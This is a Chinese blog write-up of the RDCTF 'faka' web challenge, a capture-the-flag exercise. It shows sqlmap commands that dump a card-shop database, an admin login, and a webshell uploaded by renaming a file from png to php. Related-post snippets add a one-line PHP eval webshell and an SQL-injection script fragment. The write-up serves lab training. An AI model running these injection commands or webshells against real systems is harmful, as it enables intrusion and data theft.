RDCTF-faka

最新推荐文章于 2023-01-12 23:02:11 发布
原创 最新推荐文章于 2023-01-12 23:02:11 发布 · 527 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一次SQL注入攻击的具体步骤,包括寻找注入点、利用工具抓包、使用sqlmap跑库及表等,并最终获取到敏感信息。

  • 进入题目找到注入点

在这里插入图片描述
找到注入的地方,发现购买那就是一个注入点
在这里插入图片描述
利用burp suite进行抓包
在这里插入图片描述
发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑
在这里插入图片描述
在这里插入图片描述
接着利用sqlmap跑数据库

sqlmap -r F:\a.txt -D --tables faka

因为题目名字是faka所以跑faka的表
在这里插入图片描述

sqlmap -r F:\a.txt -D faka --tables

接着跑表
在这里插入图片描述

-r F:\a.txt -D faka -T ayangw_config --columns

再跑字段
在这里插入图片描述
(这里发现跑的太慢了,跑不出来。换一种跑的方式)
在这里插入图片描述

sqlmap -u "http://117.167.136.244:28087/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump

扫描网址发现有admin 的路口
在这里插入图片描述
利用刚刚的账号密码进入后台
在这里插入图片描述
找了很久发现只能从这里上传木马
在这里插入图片描述
将木马上传发现没有变化
在这里插入图片描述
利用图片找到上传的木马

发现没有变化,尝试着把前面的png改成php

发现上传成功,连接蚁剑即可。
在这里插入图片描述
找到flag
flag{ea21bf78-e02c-4cd0-b8a6-54969b708b96}

  • 在这里介绍一个简单的方法(直接利用sqlmap跑出来flag)

利用参数–os-shell 或者 --os-cmd 直接连接
在这里插入图片描述

sqlmap -u "http://117.167.136.244:28027/ajax.php?act=selgo" --data "tyid=1" --os-shell

发现直接连接了那个网址可以直接找到flag了
在这里插入图片描述
找到flag
在这里插入图片描述
简陋,勿喷!!!

haozhu945
关注
异次元发卡最新漏洞0day(XSS组合拳)
白昼小丑的博客
01-18 3588
异次元商店头像上传处存在存储型XSS注入(user、admin均存在)。其中,user处有过滤,admin无。 将恶意脚本插入后,管理员访问用户管理页面即可执行恶意脚本。 恶意脚本执行后,会新增一个管理员用户,进而获得权限。鉴于漏洞还没有泛滥,而且很多站都有漏洞。EXP暂时不公开。需要学习可以加入知识星球
2021-07-28 CTF Webbuuoj [网鼎杯 2020 半决赛]faka
LiNa_lInA_741的博客
07-28 1150
CTF Web buu oj[网鼎杯 2020 半决赛]faka解题 [网鼎杯 2020 半决赛]faka 解题 不会写网站,做不了代码审计,就记录别人WP的解题思路,再回头来看 下载网站源代码,html/applilcation/admin,网站打开admin,跳到管理后台登录页面。 目录文件中有tk.sql文件,phpmyadmin先创建数据库,再导入tk.sql。 数据库打开表system_user,找到admin/md5后得密码 md5解密得到admin密码admincccbbb123 登
RDCTF(web:mangzhu)
weixin_50401030的博客
09-25 287
1 进入网站 输入1 得到的是 输入2得到的是 从这里可以找到一个不同的地方,开始写python代码 import requests flag="" a = "Hello, glzjin wants a girlfriend." #成功后的显示 url = "http://localhost/index.php" #题目网址 for i in range(1,50): for j in range(1,128): #两个循环 payload = "if(a..
RDCTF SHIZHAN1
sweetie 的博客
09-14 240
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
CTF实战(faka注入)
Marsper的博客
09-18 1584
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
rdctf-shizhan1借助蚁剑注入木马找到flag
qq_45970858的博客
09-14 1854
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
acg-faka–功能丰富的发卡二次元商城源码
03-20
源码引见 支付系统,具有强悍的插件扩展才干,现目今曾经支持全网恣意平台,恣意支付渠道。 云更新,假设系统升级新版本,你无需中止繁琐操作,只需求在你的店铺后台就可以无缝完成升级。 商品销售,支持商品配图、...
acg-faka--功能丰富的发卡二次元商城源码
米克源码的博客
01-12 1002
支付系统,拥有强悍的插件扩展能力,现目今已经支持全网任意平台,任意支付渠道。云更新,如果系统升级新版本,你无需进行繁琐操作,只需要在你的店铺后台就可以无缝完成升级。商品销售,支持商品配图、会员价、游客价、邮件通知、卡密预选(用户可以预选自己想购买的那个账号或者卡号)、API对接、强制登录购买、强悍的自定义控件功能、限时秒杀、批发优惠、优惠卷、等众多功能。分站系统,前台用户可以开通分站,分站可以独立运行,也可以卖主站商品,有点类似商业店铺了。
全面解析acg-faka二次元商城源码的核心功能
关于【压缩包子文件的文件名称列表】提供的信息有限,仅有一个新建文本文档和一个包含源码主体的文件(acg-faka-main),无法提供额外的知识点。不过,可以推断acg-faka-main文件应包含了上述所有提到的源码以及可能...
精选资源
异次元发卡 (1).zip
07-02
5. **acg-faka-main** - 这可能是一个代码文件或者目录,名称中的“acg”代表动画、漫画、游戏,再次强调了与二次元文化的关联。"faka"可能是“发卡”的拼音缩写,表明这是系统的主要代码部分,可能包含了逻辑处理、...
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 395
rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 424
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
[网鼎杯 2020 半决赛]faka
feng的博客
03-22 2703
前言 同样是nepctf,遇到了网鼎杯这题faka的加强版,考虑到实在太菜了,没参加过今年的网鼎杯,所以先去把网鼎杯的faka这题复现一下,源码可以很容易从网上找到。 WP 拿seay审了一下,基本上啥都没审出来啥,就审出来了一个最简单的那个任意读。不过这个任意读还需要登录,因此还需要利用其他的漏洞。 未授权添加账号和提升权限 漏洞代码位于application/admin/controller/Index.php中的info方法: public function info() {
RDCTF-考核
qq_45970858的博客
09-23 400
复制网站并打开找到注入点 找到注入的地方,发现购买那里是一个注入点 此处可利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可, 先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 python sqlmap.py -r c:\lyf\POST.txt -dbs 因为题目名字是faka所以跑faka的表 python sqlmap.py -r c:\lyf\POST.txt -D faka --tables 再跑字段 python sql
入侵靶机之实战faka题目注入
weixin_50644728的博客
09-22 530
题目来源:rdctf:8000之faka 1.寻找网站注入点 刚拿到一个新网站,首先大概浏览网站页面内容,该网站比较简单,可点击的地方较少,在购买卡密的地方选择商品后。下面就自动弹出了价格和库存等信息,猜测这里应该跟数据库是有交互的。 2.利用burpsuite抓取数据包 找到了与数据库交互的地方之后,用burpsuite抓包获取网站和数据库之间交换的数据。首先要将burp的intercept处于off状态,回到网站将商品信息选择好后点击付款,但不进行支付。 然后将burp的intercept打开,在h
首届祥云杯网络安全大赛 web wp
Firebasky的博客
11-24 1003
和团队一起打了祥云杯,感觉还是可以的,师傅们太强了~ 自己也学习了不少继续加油~ 链接:https://pan.baidu.com/s/1WKE8UhFaKajEuaIM772aRw 提取码:93um 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 779
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
CTF实例题
A1956936030的博客
09-17 1525
1.靶机目标 http://117.167.136.244:28057 2.靶机为post请求即用burpsuite抓包 打开burpsuite 3.用burpsuite对靶机进行抓包 找到购买卡密 进行购买卡密 打开intercept 抓包成功 找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo 4.用sqlmap注入 (1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act
CTF在线练习平台
weixin_41949487的博客
02-25 4779
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值